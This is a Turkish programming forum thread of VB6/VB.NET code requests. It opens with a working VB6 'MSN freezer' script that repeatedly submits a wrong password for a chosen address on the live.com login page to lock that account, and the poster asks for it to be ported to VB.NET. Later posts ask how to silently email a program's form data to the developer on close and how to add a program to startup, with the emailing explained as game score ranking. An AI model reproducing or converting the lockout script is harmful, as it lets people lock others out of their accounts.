• Forum vBulletin altyapısından Xenforo altyapısına geçirildi, bu sebeple eski şifreleriniz ile foruma giriş yapamayacaksınız, parolamı unuttum adımından mailiniz ile şifre sıfırlayarak giriş yapabilirsiniz.

Üyeliklerinde geçerli bir mail adresi olmadığı için sıfırlama yapamayacak kullanıcılar forum kullanıcı adlarını ve yeni şifrelerini yazarak info@maxigame.org adresine şifre sıfırlamak istediklerine dair bir mail göndersinler şifrelerini sıfırlayıp mail adreslerini güncelleyeceğiz. Şifreniz sıfırlandıktan sonra foruma giriş yapıp tekrar istediğiniz gibi değiştirebilirsiniz.

VB.NET Sorular - Kod istekleri

• Konuyu başlatan Konuyu başlatan Cottonmouth
  • Başlangıç tarihi Başlangıç tarihi
Private Sub Command1_Click()
WebBrowser1.Navigate ("https://mid.live.com/si/login.aspx")
Label1.Caption = "Donduruluyor..."
End Sub

Private Sub Command2_Click()
WebBrowser1.Navigate ("")
WebBrowser1.Stop
ProgressBar1.Value = "0"
Label1.Caption = "Hazır..."
Text1.Text = "Dondurulacak msn adresini buraya yazınız..."
End Sub

Private Sub Form_Load()

End Sub

Private Sub WebBrowser1_DocumentComplete(ByVal pDisp As Object, URL As Variant)
On Error Resume Next
ProgressBar1.Value = "100"
Label1.Caption = "Donduruldu !"
Dim Data As String
Data = w.Document.body.innerhtml
WebBrowser1.Document.All("LoginTextBox").Value = Text1.Text
WebBrowser1.Document.All("PasswordTextBox").Value = ";bjlkl"
WebBrowser1.Document.All("PasswordSubmit").Click
If InStr(Data, "Sign in failed.") Then
MsgBox "Donduruldu !"
End If
WebBrowser1.Navigate ("https://mid.live.com/si/login.aspx")
End Sub

kodlar vb6 için. vb.nete çevirebilecek olan var mı? bu isteği çok önceden yapmıştım fakat çeviren olmamıştı blki bu sefer çeviren çıkar. bu isteğimin üzerinden 1 buçuk ay geçti

YA Bn Şimdi Programımı Çalışttırdıklarında 2 Yada Üç tane Program Var Onları Silkroad Klosörünün Yolunu Göstercekler Ogöserdikleri Yolun İçine Kopyalıcak Bunu Nasıl Yapabilirim
Yardımmm Demoyu Yaptım Bunu Yapamıyorum

burası kod istekleri bölümü ve vb net6 deil vb6 :D ve sn direk vb.net i indir. google a yazınca çıkıyor ztn direk.

bn bir proje üzerinde çalışıyorum ve yardım lzm. formda bir textbox var ve programı kapattığımda bu textboxtaki verileri benim hotmail ve g-mail adreslerime mail olarka atmasını istiyorum. ama kodu bilmiyorum. yardım edebilir misiniz?

Arkadaşlar vb den anlıyan şu kodun dorusunu yazabilirmilütfen 2 hafta oldu daha yapamadım dosya kopyalamayı
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Dim Dizin As String
fbrowser.ShowDialog()
Dizin = fbrowser.SelectedPath & "\"
Dim Dosya As System.Resources.ResourceManager
Dosya = new System.Resources.ResourceManager(typeof("maxigamelogo.png")
)' kırmızı yer Burası Hata veriyor
FileCopy(Dosya.ToString, Dizin & "dosyaadi.png")
End Sub
End Class

2912.jpg
Resimde Görüldüğü Yanlışlık Yardım :D ??

burası kod istekleri bölümü ve vb net6 deil vb6 :D ve sn direk vb.net i indir. google a yazınca çıkıyor ztn direk.

bn bir proje üzerinde çalışıyorum ve yardım lzm. formda bir textbox var ve programı kapattığımda bu textboxtaki verileri benim hotmail ve g-mail adreslerime mail olarka atmasını istiyorum. ama kodu bilmiyorum. yardım edebilir misiniz?

yardım bekliyorum arkadaşlar bilen yazsın. acil

yardım bekliyorum arkadaşlar bilen yazsın. acil

formda bir textbox var ve programı kapattığımda bu textboxtaki verileri benim hotmail ve g-mail adreslerime mail olarka atmasını istiyorum. ama kodu bilmiyorum. yardım edebilir misiniz?
2 gündür yardım bekliyorum kimseden ses seda yok. illa ki bi bilen vardır

Benim Bir Sorum Olucaktı Bi program yaptım bitek masaüstüne kısayolunu yapamıyorum masaüstüne kısayol oluşturma kodu nedir lütfen acilll !!!

Bide Başlata Ekleme Kodu Lazım Acill Cvp Atarsanız Lütfen ??!!!!

formda bir textbox var ve programı kapattığımda bu textboxtaki verileri benim hotmail ve g-mail adreslerime mail olarka atmasını istiyorum. ama kodu bilmiyorum. yardım edebilir misiniz?
2 gündür yardım bekliyorum kimseden ses seda yok. illa ki bi bilen vardır

all ahını seven söylesin. 9 gün oldu cevap yok

Benim Bir Sorum Olucaktı Bi program yaptım bitek masaüstüne kısayolunu yapamıyorum masaüstüne kısayol oluşturma kodu nedir lütfen acilll !!!

----------

Bjkl Senin Şeyini 2 Saat Nette Baktım Bir Türlü Bulamadım .s

bn de bulamadım. oyunum için lzm. oyun bir pc den kapatıldığı anda label ve textboxlardaki değerler benim hotmail ya da gmail e gelicek. bn de böylece oyuncular arası sıralama yapıcam. oyunu travian tarzı yapıcağımdan ve online oynanamadığından dolayı böyle yapıcam. ve tabi başka bir projemde de lzm.

bn de bulamadım. oyunum için lzm. oyun bir pc den kapatıldığı anda label ve textboxlardaki değerler benim hotmail ya da gmail e gelicek. bn de böylece oyuncular arası sıralama yapıcam. oyunu travian tarzı yapıcağımdan ve online oynanamadığından dolayı böyle yapıcam. ve tabi başka bir projemde de lzm.
Madaratöründe Sınavları felan vardır Ondan Bakamıyordur Sbs felan geçsin Yardımcı olur :D Bnde Bulamadım :D

Madaratöründe Sınavları felan vardır Ondan Bakamıyordur Sbs felan geçsin Yardımcı olur :D Bnde Bulamadım :D

Sbs yaşımız çoktan geçti size başarılar :) Direk burda kod sormak yerine biraz araştırsanız çok daha güzel olucak... Senin sorunun cevabını zaten verdim. Koda gerek yok programın için setup yaparken kullandığın program otomatik yapar onu.

----------

all ahını seven söylesin. 9 gün oldu cevap yok

9 Gündür burda cevap mı bekliyorsun ? Yoksa başka yerlerde aramayı denedin mi ?

----------

SMTP Mail gönderme diye aratırsan internette bulabilirsin. Yada dur hazıra alıştınız nasılsa :) Al arattım ben : vb.net smtp mail - Google'da Ara

Son düzenleme:
Sbs yaşımız çoktan geçti size başarılar :) Direk burda kod sormak yerine biraz araştırsanız çok daha güzel olucak... Senin sorunun cevabını zaten verdim. Koda gerek yok programın için setup yaparken kullandığın program otomatik yapar onu.

----------

9 Gündür burda cevap mı bekliyorsun ? Yoksa başka yerlerde aramayı denedin mi ?

----------

SMTP Mail gönderme diye aratırsan internette bulabilirsin. Yada dur hazıra alıştınız nasılsa :) Al arattım ben : vb.net smtp mail - Google'da Ara
bulsaydım buraya yazmazdım ztn. intten bir tane bulmuştum fakat studio olduğundan kodları görememiştim. bu arada bn hiç bilmediğim bir şey hakkında soru soruyorum. kendi bilgilerimle yapabiliceğim bi şey ilk kendim uğraşır sonra sorun yaşıyosam yardım ararım

Madaratör Cottonmouth Masaüstüne Kısayolu Buldum ingilizce sitelerden Ama Başlata Ekleme Bulamadım Bari Onun İÇin Bi Kod Veririmisn :D ?

bJKL Arkdaşım Senin Şeyi Aradım Hiç Bi Sonuç Olmuyo Her şey tamam EN sON YOLLARKEN HATA ALIYOM MADARATÖRE KALDI İŞİN :D

Geri